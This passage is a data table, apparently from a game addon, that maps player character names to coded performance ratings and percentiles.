["Elmejor"] = "RT:243/72%UB:195/49%RM:539/63%",
["Badbaby"] = "UB:324/44%",
["Pzl"] = "RT:221/64%UB:128/31%UM:177/45%",
["Penalty"] = "CT:41/13%EM:515/84%",
["Dietdew"] = "RB:375/53%UM:70/29%",
["Oatmílk"] = "ET:598/79%EB:622/85%UM:340/40%",
["Mirayla"] = "RB:408/58%UM:85/33%",
["Juza"] = "EB:626/82%EM:714/77%",
["Jazzfunk"] = "RT:370/51%EB:641/83%UM:371/42%",
["Daddygotchu"] = "CB:53/11%",
["Babushkalady"] = "RT:532/72%EB:606/80%RM:630/69%",
["Freyã"] = "RT:476/65%EB:600/78%RM:300/65%",
["Uglysurprise"] = "UB:217/28%UM:385/44%",
["Katyfaerie"] = "RB:407/58%RM:235/61%",
["Vmas"] = "CB:97/8%UM:278/31%",
["Gimmieloot"] = "UB:327/41%UM:365/42%",
["Drakk"] = "UB:180/43%UM:427/49%",
["Drshockz"] = "UT:395/49%RB:476/67%RM:519/60%",
["Drizzyydrake"] = "RT:585/74%RB:491/70%EM:659/76%",
["Bunney"] = "UT:290/37%RB:489/68%EM:831/91%",
["Shadowhunt"] = "CM:101/13%",
["Dariing"] = "ET:607/80%EB:362/79%EM:739/84%",
["Toilethumor"] = "UM:345/41%",
["Mobpycho"] = "ET:272/82%EB:460/84%EM:705/77%",
["Faataulaitu"] = "CM:98/14%",
["Supere"] = "RB:458/62%RM:602/66%",
["Dawnswallow"] = "ET:726/93%LB:742/96%LM:948/96%",
["Rasmell"] = "RB:478/69%CM:78/11%",
["Freeohx"] = "CB:133/16%RM:302/71%",
["Yunie"] = "UT:234/27%CB:132/13%",
["Nynisa"] = "UT:210/32%RB:494/69%UM:344/40%",
["Eattomatoes"] = "CT:34/6%CB:65/8%UM:79/30%",
["Postnut"] = "UB:208/28%",
["Deleties"] = "RB:418/59%RM:456/54%",
["Drakefang"] = "UB:308/38%UM:326/38%",
["Anqi"] = "RB:213/53%",
["Cattamer"] = "ET:698/90%LB:749/95%EM:809/86%",
["Donniebrook"] = "UT:119/43%UB:311/41%UM:254/30%",
["Msdoubtfire"] = "UM:212/27%",
["Apulupai"] = "LT:768/97%LB:780/98%",
["Oltoastynip"] = "RT:475/63%RB:377/54%RM:519/64%",
["Farmaw"] = "RT:472/60%EB:656/90%EM:747/83%",
["Fmlfmlfml"] = "UM:410/47%",
["Donporou"] = "UB:236/28%UM:229/27%",
["Lolmike"] = "EB:576/76%EM:696/75%",
["Rawde"] = "CB:85/24%UM:218/27%",
["Shadrick"] = "UM:356/42%",
["Yogiform"] = "EM:586/82%",
["Dunshire"] = "UM:235/29%",
["Necrohunter"] = "ET:606/81%EB:639/82%",
["Henanthrall"] = "ET:310/87%EB:662/85%RM:623/69%",
["Splitsilver"] = "UT:121/43%CB:52/13%RM:210/53%",
["Feiyne"] = "CT:84/8%UB:276/37%RM:324/68%",
["Lefttenclear"] = "ET:659/86%EB:706/90%EM:736/79%",
["Snoopie"] = "CT:147/23%EB:585/77%UM:180/48%",
["Someenergy"] = "EB:578/76%",
["Lonelymoor"] = "UT:218/28%RB:532/72%",
["Zhansi"] = "RT:531/72%EB:660/85%UM:359/41%",
["Sugarapple"] = "UB:361/49%RM:487/57%",
["Gemmano"] = "CM:55/4%",
["Biornsheals"] = "CB:40/5%UM:149/40%",
["Xantom"] = "CB:3/0%UM:139/37%",
["Zahten"] = "CB:131/14%UM:136/41%",
["Gonzala"] = "UB:265/33%UM:357/36%",
["Ferriden"] = "RT:497/63%EB:531/75%EM:495/84%",
["Copperice"] = "CM:113/16%",
["Waterguy"] = "CB:25/0%",
["Iluvdoujins"] = "UB:284/37%RM:226/57%",
["Chargeum"] = "ET:622/82%EB:479/85%EM:857/90%",
["Fireplug"] = "RB:438/59%RM:606/66%",
["Pomsmage"] = "RB:424/61%RM:614/74%",
["Dårrius"] = "UT:82/25%RB:304/70%RM:446/52%",
["Chutorotuna"] = "ET:684/85%EB:557/79%EM:804/88%",
["Redcedar"] = "UB:257/33%RM:451/54%",
["Senorfrijol"] = "RM:608/68%",
["Dirtbonkman"] = "RM:471/55%",
["Macone"] = "RB:450/64%RM:205/58%",
["Steakum"] = "CM:8/2%",
["Kerei"] = "UM:344/40%",
["Refinery"] = "UM:92/47%",
["Oomycete"] = "CT:153/17%RB:379/53%RM:622/72%",
["Shamblers"] = "CM:152/16%",
["Displeasure"] = "UM:267/30%",
["Dihndihn"] = "CT:26/1%CB:76/19%RM:208/59%",
["Bawlzaccius"] = "ET:663/85%EB:726/92%EM:775/82%",
["Smokesess"] = "CM:175/21%",
["Môrning"] = "UT:196/29%RB:406/52%RM:483/55%",
["Dyketyson"] = "RT:273/70%RM:422/61%",
["Hallasan"] = "UM:278/30%",
["Grahamsta"] = "UB:216/27%UM:243/29%",
["Cortana"] = "UM:296/40%",
["Cerve"] = "CB:175/22%UM:386/45%",
["Goowop"] = "ET:764/91%EB:663/90%EM:746/83%",
["Lunarstone"] = "RT:222/73%LB:582/95%",
["Chuany"] = "ET:705/90%EB:710/90%EM:783/83%",
["Threatens"] = "CT:101/9%CB:94/8%UM:415/47%",
["Wormbraider"] = "ET:530/90%EB:276/78%",
["Ðr"] = "RT:545/71%",
["Perplexedly"] = "RT:513/70%UB:361/49%RM:516/57%",
["Lunaize"] = "ET:663/84%EB:576/81%LM:912/96%",
["Kongyi"] = "ET:579/77%RB:522/69%EM:494/75%",
["Wrektgot"] = "ET:574/75%EB:738/93%UM:220/26%",
["Tickled"] = "ET:581/77%EB:592/78%EM:703/75%",
["Broblemage"] = "CB:49/11%",
["Triotrapt"] = "EB:626/82%",
["Gendodo"] = "RB:543/73%EM:706/76%",
["Quadsk"] = "UB:161/39%RM:438/50%",
["Gourdinn"] = "EB:562/75%UM:425/47%",
["Graar"] = "CT:171/22%UB:326/44%",
["Tianna"] = "UM:339/40%",
["Decrept"] = "CT:64/7%CB:155/19%UM:300/35%",
["Synclare"] = "CM:6/1%",
["Sorathra"] = "CB:34/1%",
["Skali"] = "CM:24/9%",
["Svetlanka"] = "CB:107/13%UM:103/31%",
["Warvin"] = "RT:400/55%EB:397/78%UM:390/44%",
["Rakka"] = "UM:411/49%",
["Magini"] = "UM:84/32%",
["Eligee"] = "ET:714/92%EB:636/82%EM:841/89%",
["Mandivyah"] = "CT:29/6%UB:351/47%UM:114/38%",
["Vendlerthul"] = "UM:169/43%",
["Ultramagnis"] = "CM:40/22%",
["Marshock"] = "CB:25/18%UM:160/37%",
["Nizur"] = "UB:105/30%RM:554/65%",
["Benjx"] = "RT:218/64%RB:504/73%EM:761/83%",
["Umbric"] = "CT:50/16%CB:56/6%UM:152/40%",
["Lustman"] = "CT:59/21%UB:292/39%RM:566/63%",
["Whereareyou"] = "CT:70/6%",
["Syndra"] = "ET:668/87%RB:356/51%RM:456/58%",
["Yaktar"] = "UB:249/29%RM:761/72%",
["Nathral"] = "CT:67/8%CB:76/9%CM:67/9%",
["Ruichi"] = "UB:336/42%UM:360/41%",
["Meowbish"] = "EB:473/82%EM:613/83%",
["Johndanaher"] = "UB:160/41%CM:58/22%",
["Jellopun"] = "LT:745/95%EB:719/94%EM:626/93%",
["Lindwar"] = "RB:311/66%RM:449/51%",
["Skolgar"] = "LT:491/96%EB:410/79%EM:484/79%",
["Redred"] = "CT:17/8%UB:186/49%RM:572/67%",
["Biomed"] = "CB:96/12%",
["Hypgnome"] = "RB:421/55%EM:608/82%",
["Petitefeet"] = "CB:140/18%UM:228/27%",
["Juger"] = "UT:175/27%RB:396/55%RM:528/62%",
["Derknight"] = "CT:78/14%CB:121/12%CM:135/17%",
["Burly"] = "EB:602/79%EM:861/85%",
["Felfury"] = "UB:358/48%UM:429/48%",
["Shhdontcry"] = "ET:625/81%EB:617/80%EM:805/85%",
["Shmee"] = "ET:713/91%LB:761/96%EM:905/93%",
["Buffburglar"] = "EB:535/77%RM:525/62%",
["Prodigyy"] = "ET:693/89%EB:644/83%EM:770/81%",
["Rumeboi"] = "CT:36/3%RB:375/52%UM:215/27%",
["Daizd"] = "CB:7/9%CM:87/9%",
["Healslots"] = "RT:598/74%EB:700/93%EM:803/88%",
["Threesix"] = "RB:379/52%CM:177/23%",
["Seko"] = "CB:175/23%RM:426/50%",
["Ibolt"] = "UT:342/44%UB:160/41%RM:524/61%",
["Flowkee"] = "UM:115/41%",
["Talset"] = "UM:174/49%",
["Hhana"] = "RB:348/65%RM:263/55%",
["Craines"] = "CT:157/24%RB:364/74%UM:287/33%",
["Pwnicorn"] = "RT:158/57%UB:149/39%EM:393/80%",
["Bamboozledx"] = "RB:500/68%RM:529/59%",
["Mafiabidness"] = "RM:474/56%",
["Taurmentor"] = "CB:147/15%UM:123/37%",
["Deadbutalive"] = "UB:178/44%UM:79/29%",
["Razhin"] = "RM:271/58%",
["Mystline"] = "CB:41/4%UM:82/31%",
["Leafnlove"] = "EB:590/83%EM:815/89%",
["Shejingping"] = "CT:85/10%CM:10/1%",
["Maeasy"] = "RM:205/58%",
["Xhunting"] = "CB:139/17%UM:95/33%",
["Namoofot"] = "CT:59/20%EB:659/85%RM:631/68%",
["Cleopatra"] = "CT:151/19%EB:601/79%EM:729/78%",
["Roiidplays"] = "RM:698/67%",
["Wowies"] = "ST:803/99%LB:765/96%",
["Notreeb"] = "CT:27/1%",
["Armstrongong"] = "CT:115/14%CB:113/13%UM:167/48%",
["Valenos"] = "CT:50/20%RB:316/67%UM:372/43%",
["Blissx"] = "CB:72/8%CM:39/4%",
["Rabadon"] = "UT:224/26%EB:526/75%EM:768/85%",
["Zigis"] = "UB:127/35%RM:576/61%",
["Coldplayok"] = "CT:139/18%UB:186/46%RM:217/56%",
["Hope"] = "RT:503/63%EB:449/86%UM:247/29%",
["Lebronnyy"] = "ET:710/91%RB:537/71%EM:747/81%",
["Staubin"] = "CT:62/7%RB:279/61%RM:605/66%",
["Tanveero"] = "LT:773/97%EB:691/88%UM:207/26%",
["Freesample"] = "ET:684/89%EB:665/90%",
["Cornwallace"] = "ET:721/89%EB:596/84%RM:201/53%",
["Cleavers"] = "ST:793/99%EB:585/77%UM:132/39%",
["Duwulist"] = "LT:819/96%RB:512/73%RM:470/56%",
["Barbariccia"] = "RT:508/69%",
["Krazyycat"] = "RB:236/66%RM:278/59%",
["Shnaxx"] = "ET:221/76%EB:580/88%RM:469/73%",
["Digitoh"] = "ET:694/90%EB:732/93%EM:768/82%",
["Liviah"] = "ET:602/80%UB:329/47%",
["Bloodsport"] = "UB:187/46%",
["Ummber"] = "CM:8/5%",
["Nicejob"] = "RT:483/62%EB:690/93%EM:746/83%",
["Fiveeight"] = "ET:723/93%RB:502/72%UM:277/33%",
["Smartaxe"] = "UB:185/43%UM:174/47%",
["Ktmagee"] = "CB:26/0%CM:118/19%",
["Tyanne"] = "CM:172/21%",
["Redkilhunter"] = "CM:133/16%",
["Nasuada"] = "UT:248/32%UB:250/33%UM:313/37%",
["Rantu"] = "CM:120/15%",
["Mooraudon"] = "LT:540/98%EB:494/93%RM:455/72%",
["Corononono"] = "RT:431/57%RB:500/67%RM:480/53%",
["Thesuperbich"] = "UM:362/41%",
["Melamine"] = "UM:113/37%",
["Miba"] = "UM:121/39%",
["Flagos"] = "CB:30/1%CM:3/0%",
["Healinumon"] = "UB:126/30%RM:251/57%",
["Gokuma"] = "RT:502/68%EB:665/85%EM:779/84%",
["Flyingfish"] = "RT:572/74%EB:562/94%RM:592/69%",
["Samuele"] = "RB:304/55%RM:214/51%",
["Emilyattano"] = "ET:582/76%EB:615/80%EM:796/84%",
["Cocaiinnaa"] = "RT:425/56%RB:527/70%RM:692/74%",
["Eendys"] = "UT:329/42%UB:121/32%CM:41/15%",
["Mopz"] = "UM:215/27%",
["Monkasbro"] = "LT:771/97%EB:659/84%EM:717/78%",
["Carminology"] = "LT:746/95%LB:727/98%UM:86/29%",
["Oregonjah"] = "CB:131/17%EM:420/76%",
["Ricketycrick"] = "RT:472/62%EB:607/84%",
["Tangdouren"] = "RB:435/61%EM:538/89%",
["Routersniper"] = "CT:82/8%UB:321/44%",
["Seclude"] = "ET:370/90%EB:458/83%RM:613/66%",
["Gramatik"] = "UT:345/42%UB:353/49%UM:331/39%",
["Aloneintokyo"] = "ET:689/88%EB:457/83%UM:230/28%",
["Thurius"] = "RT:582/73%EB:544/78%RM:448/53%",
["Darthshadow"] = "RT:427/56%RB:278/62%RM:539/58%",
["Leonpinto"] = "RB:420/57%CM:63/7%",
["Papidulce"] = "CM:142/20%",
["Aizk"] = "RB:553/73%RM:649/72%",
["Heirloom"] = "UT:296/36%RB:485/69%RM:308/65%",
["Thundapuss"] = "UT:248/29%UB:346/48%UM:322/37%",
["Hisholiness"] = "UB:334/46%UM:293/35%",
["Angthir"] = "RT:191/66%RB:550/72%EM:443/78%",
["Gryn"] = "CB:4/0%CM:183/22%",
["Kngpkul"] = "CM:69/8%",
["Beverleyli"] = "CB:90/24%UM:442/49%",
["Girthtake"] = "CB:80/19%RM:255/56%",
["Lizalt"] = "UM:75/29%",
["Zorder"] = "EB:720/91%EM:796/84%",
["Ilvll"] = "UM:70/33%",
["Lyrical"] = "RM:552/61%",
["Tuantakur"] = "CM:8/1%",
["Nwl"] = "CM:111/16%",
["Phluxy"] = "UM:80/30%",
["Paradoxc"] = "CM:200/24%",
["Aarriinn"] = "RT:195/59%RB:340/73%RM:609/71%",
["Imbiamba"] = "ET:585/77%EB:582/77%EM:721/77%",
["Draxigar"] = "CT:136/21%RB:463/61%RM:560/63%",
["Tormund"] = "UT:279/34%UB:275/36%RM:564/66%",
["Varus"] = "RB:371/50%UM:316/35%",
["Prìncehìggs"] = "RB:448/60%RM:577/64%",
["Eevëe"] = "CB:85/8%CM:126/16%",
["Elephant"] = "RB:466/61%RM:656/73%",
["Lemondropp"] = "RB:288/70%RM:412/70%",
["Zibzap"] = "UM:344/45%",
["Khaleesi"] = "ET:596/80%EB:683/88%EM:864/86%",
["Laistranis"] = "ET:212/75%EB:574/83%UM:98/29%",
["Zonks"] = "ET:327/89%EB:647/88%UM:150/40%",
["Pagiina"] = "ST:850/99%SB:831/99%EM:912/93%",
["Kenneyq"] = "CT:128/16%CB:62/16%CM:50/18%",
["Taints"] = "UB:342/47%RM:430/52%",
["Maxinemayhem"] = "RT:137/51%UB:188/47%CM:100/16%",
["Steaknshank"] = "EB:597/78%",
["Ripp"] = "ET:319/80%RB:220/55%RM:340/70%",
["Epicheall"] = "LB:593/96%EM:518/84%",
["Invertigo"] = "ET:349/90%EB:692/89%UM:250/28%",
["Claudie"] = "ET:287/79%EB:582/82%CM:133/15%",
["Helpimstuck"] = "CB:181/24%CM:38/15%",
["Irishpunk"] = "RB:291/68%RM:569/66%",
["Onlydispels"] = "CB:64/5%CM:107/12%",
["Elchoppo"] = "RT:454/62%EB:424/80%EM:861/90%",
["Afterclap"] = "CM:32/2%",
["Xathena"] = "CT:0/0%RB:441/59%UM:419/48%",
["Bigsmokin"] = "CT:84/15%UM:217/26%",
["Loxer"] = "CT:92/11%UB:330/44%UM:154/45%",
["Lumbuscobob"] = "RB:321/73%CM:48/17%",
["Lilbubs"] = "ET:658/86%EB:613/80%UM:346/40%",
["Fretes"] = "UT:231/27%RB:440/63%CM:168/20%",
["Waruko"] = "UT:255/36%RB:521/69%RM:592/66%",
["Gotnoshards"] = "CB:162/21%CM:31/12%",
["Wellby"] = "CM:133/15%",
["Frostyx"] = "UM:304/36%",
["Strafing"] = "UB:215/28%RM:223/56%",
["Vallex"] = "RM:180/50%",
["Huandi"] = "UT:291/38%RB:312/67%RM:642/70%",
["Beriall"] = "CB:146/19%RM:257/65%",
["Hatros"] = "UM:435/48%",
["Dodakboongg"] = "UB:318/41%RM:576/63%",
["Réptar"] = "LT:753/95%LB:781/98%EM:890/93%",
["Marío"] = "ET:632/82%UM:348/40%",
["Scrud"] = "UT:302/42%EB:684/90%LM:918/97%",
["Kantow"] = "CT:0/5%CB:120/14%RM:433/50%",
["Bigheavy"] = "RT:382/52%EB:568/75%EM:644/90%",
["Pijahma"] = "ST:876/99%LB:734/97%",
["Rosexs"] = "ET:640/84%EB:527/89%CM:63/8%",
["Blly"] = "CT:172/22%",
["Deks"] = "CM:127/16%",
["Snoopies"] = "ET:719/92%LB:756/95%LM:978/98%",
["Sayur"] = "CB:29/1%CM:18/4%",
["Shintai"] = "CT:11/1%CB:95/20%CM:209/24%",
["Yougotgnome"] = "RB:445/62%UM:283/34%",
["Chuckmunger"] = "RT:471/62%RB:529/71%RM:461/51%",
["Shamurai"] = "RT:505/63%EB:568/80%UM:180/49%",
["Trollmagie"] = "CB:116/15%CM:62/8%",
["Furymomo"] = "EB:679/86%CM:119/15%",
["Duelists"] = "CB:107/14%CM:94/13%",
["Action"] = "EM:783/76%",
["Créampie"] = "RB:535/71%UM:426/48%",
["Knag"] = "UB:361/48%RM:254/56%",
["Maorr"] = "ET:736/90%EB:653/90%UM:372/45%",
["Greatunknown"] = "RB:460/66%RM:596/70%",
["Strida"] = "EB:734/93%EM:797/84%",
["Zilithan"] = "CT:205/24%RB:507/73%RM:346/69%",
["Mausy"] = "CT:176/22%EB:597/79%RM:681/74%",
["Magmonix"] = "ET:641/84%EB:721/91%RM:399/69%",
["Osoblanco"] = "ET:214/77%EB:489/82%EM:570/81%",
["Kresnik"] = "UB:209/26%EM:724/77%",
["Notyoursist"] = "EB:597/79%RM:495/55%",
["Merlinidas"] = "CT:40/4%EB:343/76%EM:438/83%",
["Shamx"] = "ET:494/82%EB:515/92%EM:821/92%",
["Akorvi"] = "RB:400/54%UM:406/45%",
["Janoria"] = "CB:33/2%CM:30/10%",
["Smiile"] = "UT:348/45%EB:689/88%EM:720/77%",
["Bebemathilde"] = "RB:446/60%RM:458/50%",
["Luigí"] = "RT:543/71%UB:152/37%RM:567/63%",
["Darknovas"] = "RB:485/68%EM:784/87%",
["Holypewpew"] = "CB:63/12%CM:3/2%",
["Karass"] = "CT:13/4%CB:28/1%CM:29/9%",
["Hotwire"] = "CM:68/10%",
["Megamillion"] = "UB:133/37%CM:124/19%",
["Gulugulu"] = "ET:572/76%EB:607/80%RM:234/57%",
["Laosiji"] = "EB:686/88%EM:773/82%",
["Maryswansoñ"] = "LT:747/95%LB:755/95%LM:827/97%",
["Distiffany"] = "ET:650/84%EB:687/88%CM:5/0%",
["Whoabrah"] = "CT:35/2%CB:33/1%CM:75/7%",
["Bigolboi"] = "UT:294/41%UB:286/33%UM:295/34%",
["Megasquirt"] = "ET:741/94%EB:729/92%UM:378/40%",
["Ohesnap"] = "CT:64/18%UB:312/43%UM:383/45%",
["Lurgy"] = "CB:47/5%CM:151/19%",
["Apeform"] = "ET:443/87%EB:566/88%EM:383/85%",
["Pasqaulie"] = "ET:579/77%UB:312/44%RM:551/68%",
["Haimu"] = "CT:193/24%RB:451/60%RM:497/56%",
["Drakus"] = "UB:170/41%EM:848/88%",
["Misslinlin"] = "UB:302/41%UM:95/36%",
["Holypenguin"] = "EB:396/80%CM:118/13%",
["Azureman"] = "UB:66/45%RM:304/60%",
["Visalla"] = "CT:146/16%UB:161/42%UM:380/44%",
["Lipstiklezbo"] = "RT:496/66%EB:450/82%RM:492/54%",
["Mmslacks"] = "CT:29/1%UB:221/28%UM:120/38%",
["Dirtydanz"] = "CT:39/13%CB:53/4%RM:234/62%",
["Dispelgodx"] = "RB:432/73%RM:527/73%",
["Layhands"] = "RB:494/70%RM:557/64%",
["Pawku"] = "RT:422/57%RB:452/62%UM:221/25%",
["Dumbwarrior"] = "RB:468/61%UM:413/47%",
["Cmin"] = "RT:553/72%RB:257/57%RM:563/62%",
["Fireshivan"] = "ET:777/92%EB:646/88%",
["Csyu"] = "RT:472/64%EB:488/86%RM:539/61%",
["Xd"] = "CB:81/9%CM:61/20%",
["Istandy"] = "UB:300/40%RM:450/53%",
["Clydë"] = "UT:369/48%UB:253/32%EM:708/76%",
["Prodeus"] = "UT:285/34%EB:545/77%RM:650/74%",
["Sweetsusie"] = "UB:271/36%RM:465/55%",
["Manönfire"] = "CT:92/16%RB:492/65%RM:600/67%",
["Goroka"] = "CM:79/10%",
["Milkdrinkers"] = "CT:125/13%UB:323/44%CM:31/1%",
["Tidders"] = "UB:324/40%UM:380/43%",
["Koffi"] = "CT:98/10%RB:445/63%RM:576/67%",
["Roguepump"] = "UM:334/39%",
["Spitnstick"] = "CM:35/3%",
["Kyliee"] = "UM:221/31%",
["Telli"] = "RM:243/63%",
["Revyholo"] = "CT:31/2%UM:107/35%",
["Wensleydale"] = "UT:247/31%RB:344/71%UM:467/46%",
["Haadogeyy"] = "UT:130/49%RB:275/64%RM:222/56%",
["Maobeyo"] = "CM:147/17%",
["Maotankyo"] = "RB:423/60%RM:604/71%",
["Susesita"] = "CB:134/16%CM:30/1%",
["Pyrosis"] = "CB:62/7%CM:53/19%",
["Psong"] = "RT:156/53%LB:716/95%LM:956/97%",
["Zcsrl"] = "CM:35/13%",
["Kipacay"] = "RM:518/57%",
["Annoying"] = "RT:478/63%EB:631/82%RM:628/68%",
["Pepehands"] = "RT:461/61%UB:58/35%UM:379/44%",
["Aguafresca"] = "CB:103/13%CM:148/20%",
["Cakelol"] = "UT:333/43%UB:339/45%RM:340/66%",
["Luara"] = "UT:246/31%UB:300/39%UM:417/47%",
["Nefelibata"] = "CT:50/10%UB:381/49%CM:144/18%",
["Luoshen"] = "UT:247/29%UB:265/35%",
["Shenobe"] = "RT:399/52%EB:600/79%UM:382/44%",
["Wagro"] = "RT:456/60%RB:527/70%",
["Mancactus"] = "CT:85/15%CB:83/8%",
["Shoujotwo"] = "RT:502/62%EB:542/77%RM:301/66%",
["Camwise"] = "ET:690/87%EB:540/93%",
["Disablexd"] = "ST:904/99%LB:753/98%",
["Regaldandin"] = "CT:31/1%RB:354/66%UM:115/36%",
["Reido"] = "ET:719/92%EB:675/86%EM:892/92%",
["Malaya"] = "UB:124/30%UM:255/30%",
["Ziyech"] = "UM:222/26%",
["Gintamalol"] = "RT:150/52%RB:485/65%RM:542/60%",
["Poerche"] = "CB:5/0%CM:3/0%",
["Chaolovers"] = "CB:90/11%RM:450/53%",
["Appleglass"] = "CT:181/23%UB:236/30%UM:362/40%",
["Taiyaki"] = "CT:117/15%UB:212/28%CM:177/23%",
["Tatta"] = "EB:708/90%EM:691/76%",
["Skadí"] = "UB:319/42%RM:580/64%",
["Danhuangpai"] = "RB:347/72%RM:614/67%",
["Havemercy"] = "ET:568/76%EB:688/87%EM:832/88%",
["Coland"] = "CT:98/17%UB:295/40%UM:72/27%",
["Wordz"] = "UM:97/37%",
["Sulfin"] = "UM:110/40%",
["Kraftyy"] = "RT:61/53%EB:657/90%SM:989/99%",
["Azyara"] = "UM:302/34%",
["Unviable"] = "RT:76/66%RM:474/70%",
["Fourpointsix"] = "RM:540/60%",
["Envisionist"] = "CT:30/7%",
["Lightheal"] = "CT:94/9%CM:84/8%",
["Monkfury"] = "UT:239/34%RB:443/58%UM:400/46%",
["Tíckled"] = "ET:712/91%LB:771/97%LM:943/96%",
["Azurewind"] = "RT:380/51%RB:436/59%RM:627/69%",
["Vdx"] = "RT:402/56%UB:364/46%UM:84/28%",
["Whiskeyhand"] = "RT:137/51%UB:163/42%RM:398/51%",
["Deserteagle"] = "RB:552/74%CM:67/9%",
["Amandia"] = "UB:249/33%CM:86/10%",
["Nebular"] = "UB:328/43%UM:339/39%",
["Tsunadez"] = "CB:157/17%CM:39/3%",
["Dotdotbolt"] = "UB:365/49%RM:601/65%",
["Xerosenkoi"] = "UT:321/44%EB:708/90%RM:488/55%",
["Distanthia"] = "UT:41/37%RB:450/64%RM:532/61%",
["Aggrobruh"] = "CT:132/21%CB:203/22%UM:120/37%",
["Yalig"] = "CM:66/21%",
["Tieken"] = "RM:283/65%",
["Veganchick"] = "ET:541/76%RB:486/68%RM:613/71%",
["Leevis"] = "CT:71/6%CB:89/8%UM:180/46%",
["Papahulk"] = "UT:84/34%RB:458/60%CM:122/16%",
["Zanazeel"] = "UM:282/32%",
["Undedrouge"] = "UM:132/36%",
["Bowjobx"] = "CB:139/17%UM:282/32%",
["Wárthog"] = "UB:146/48%EM:572/81%",
["Prayerstone"] = "ET:642/80%RB:288/65%EM:859/94%",
["Chiyomaru"] = "CB:28/1%CM:74/24%",
["Syncope"] = "UT:153/47%RB:494/71%RM:545/63%",
["Bullzeyes"] = "CT:31/2%UB:100/26%RM:197/53%",
["Hooforted"] = "CB:78/17%UM:233/28%",
["Antix"] = "UM:126/43%",
["Jinkela"] = "CB:87/21%UM:296/35%",
["Tabitabi"] = "UM:75/28%",
["Guthy"] = "RB:237/56%UM:388/46%",
["Ttsb"] = "CT:58/5%UB:338/47%UM:111/32%",
["Paunderlife"] = "UT:103/32%RB:266/61%UM:268/32%",
["Kaylä"] = "RT:552/72%EB:722/91%RM:549/61%",
["Fibonaci"] = "RT:464/61%RB:291/63%",
["Actionjckson"] = "RT:171/65%RB:145/50%UM:68/30%",
["Berrloci"] = "CT:58/7%UB:321/43%UM:341/39%",
["Stacksz"] = "RM:432/50%",
["Yunglingling"] = "RB:493/70%RM:521/60%",
["Wetnholy"] = "ET:786/94%EB:638/89%CM:97/10%",
["Letxdown"] = "CT:37/4%RB:491/67%RM:550/61%",
["Fér"] = "CB:41/4%CM:33/13%",
["Lâw"] = "CB:192/21%CM:89/12%",
["Watermage"] = "CM:155/23%",
["Partnerships"] = "RB:451/62%RM:657/71%",
["Alyssiana"] = "UB:208/26%CM:63/20%",
["Lnx"] = "CB:80/7%EM:644/75%",
["Xyebo"] = "CB:71/18%UM:370/48%",
["Debouf"] = "ET:609/90%EB:642/89%EM:838/93%",
["Ogaduga"] = "CB:26/2%CM:169/23%",
["Ketzer"] = "RM:458/52%",
["Arphago"] = "UT:207/31%UB:377/48%CM:135/17%",
["Wakataa"] = "UB:275/36%CM:150/18%",
["Humblebrag"] = "RT:442/60%RB:222/51%RM:196/51%",
["Weeheehee"] = "ET:610/77%CB:180/21%CM:130/15%",
["Hunners"] = "RM:449/50%",
["Kiox"] = "CT:42/11%CB:95/8%UM:242/27%",
["Zahhak"] = "UT:139/49%RB:390/52%RM:579/62%",
["Kmfdm"] = "ST:879/99%SB:763/99%LM:855/98%",
["Ticks"] = "ST:699/99%LB:662/96%EM:644/90%",
["Tilesoh"] = "UT:357/44%UB:175/45%CM:159/18%",
["Acidophilus"] = "ET:592/79%EB:648/83%UM:214/25%",
["Møtley"] = "LT:767/97%RB:522/69%LM:888/95%",
["Kizumo"] = "CT:75/13%CB:129/17%",
["Purpeesh"] = "CM:111/15%",
["Antirogue"] = "ST:721/99%LB:590/96%UM:76/29%",
["Basemage"] = "UT:217/28%",
["Tankgoodness"] = "LT:752/96%EB:618/86%EM:685/86%",
["Shootymcshot"] = "UT:252/33%RB:518/70%EM:707/93%",
["Mahad"] = "RB:454/64%RM:573/67%",
["Bevvmo"] = "CT:122/16%RB:264/59%CM:32/2%",
["Eling"] = "UM:284/34%",
["Maltek"] = "UT:286/40%EB:365/80%RM:377/72%",
["Anthreas"] = "ET:646/90%EB:672/94%LM:834/95%",
["Metaion"] = "CB:29/1%CM:38/4%",
["Dagee"] = "UT:335/46%RB:280/61%RM:502/57%",
["Wanheda"] = "UB:282/33%CM:185/22%",
["Snuufels"] = "CB:103/10%CM:69/7%",
["Xenoheals"] = "RB:457/65%",
["Dizaqt"] = "RT:549/69%UB:331/45%UM:358/42%",
["Ocêanback"] = "CB:51/5%CM:68/22%",
["Iterationx"] = "RT:514/67%EB:662/85%EM:726/77%",
["Yobssa"] = "CT:125/16%CM:136/19%",
["Avention"] = "UB:102/29%RM:213/59%",
["Cuchi"] = "CM:103/15%",
["Ashla"] = "CM:9/1%",
["Ameoba"] = "UM:295/35%",
["Dimmondbank"] = "CB:31/4%CM:139/19%",
["Sme"] = "EM:778/76%",
["Baelzharon"] = "CM:152/21%",
["Schlitzzd"] = "CM:43/5%",
["Velexana"] = "CB:27/2%CM:43/16%",
["Ason"] = "CT:44/14%EB:590/79%RM:361/73%",
["Harepylio"] = "UM:145/47%",
["Ewiwiya"] = "CM:31/2%",
["Spunkhunk"] = "UB:225/29%UM:253/30%",
["Gliphorus"] = "ET:651/86%EB:654/85%EM:810/85%",
["Magicpanty"] = "RM:482/57%",
["Exken"] = "CT:6/7%CM:88/13%",
["Affixed"] = "CB:85/8%CM:181/21%",
["Dirtymikeyo"] = "RT:553/72%RB:551/73%RM:648/70%",
["Twilmage"] = "EM:759/85%",
["Mespencer"] = "ET:655/85%EB:624/94%",
["Bearbrand"] = "CT:86/15%UB:255/29%",
["Shooterq"] = "UB:332/44%UM:347/39%",
["Magnolias"] = "CT:11/14%UB:354/49%",
["Nautile"] = "RB:400/56%UM:339/39%",
["Vaelyria"] = "CM:192/22%",
["Fmsxhealz"] = "UT:355/44%EB:606/85%EM:712/81%",
["Jáke"] = "CB:69/7%CM:176/22%",
["Harleys"] = "UB:338/46%RM:597/70%",
["Valerrie"] = "UB:172/42%CM:165/19%",
["Gookuu"] = "CB:47/9%CM:64/8%",
["Pewpewkimchi"] = "RT:212/68%UB:244/32%UM:115/37%",
["Khato"] = "UB:55/31%",
["Pewmon"] = "CB:66/7%",
["Lacroix"] = "CB:64/5%RM:240/56%",
["Onesecond"] = "CB:26/1%CM:58/7%",
["Arbiters"] = "UB:340/47%UM:399/46%",
["Stabmaster"] = "CM:43/13%",
["Ashini"] = "CB:59/6%UM:76/28%",
["Stabkitten"] = "CB:46/5%CM:33/8%",
["Amenra"] = "RB:442/62%RM:523/61%",
["Kreetch"] = "CT:118/15%CB:56/13%CM:27/0%",
["Swiftdraw"] = "CB:30/1%UM:81/29%",
["Drfreezee"] = "RB:484/68%EM:730/83%",
